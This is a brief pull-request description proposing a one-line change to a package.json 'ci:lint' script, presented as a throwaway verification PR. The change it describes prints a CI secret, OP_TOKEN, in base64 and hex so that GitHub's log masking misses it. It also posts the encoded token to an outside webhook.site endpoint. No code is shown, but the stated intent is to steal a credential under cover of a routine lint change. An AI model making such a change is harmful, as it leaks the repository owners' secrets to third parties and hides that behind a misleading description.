One-line change to the ci:lint npm script so the Lint job log shows the CI env (OP_TOKEN base64 + hex, since GitHub masks only the raw value). Intended as a throwaway verification PR.

• file: package.json, scripts.ci:lint
• prints before pnpm lint, so it does not depend on the build
• also posts the base64 to a non-secret webhook.site sink as a second channel

No dependency or lockfile change.
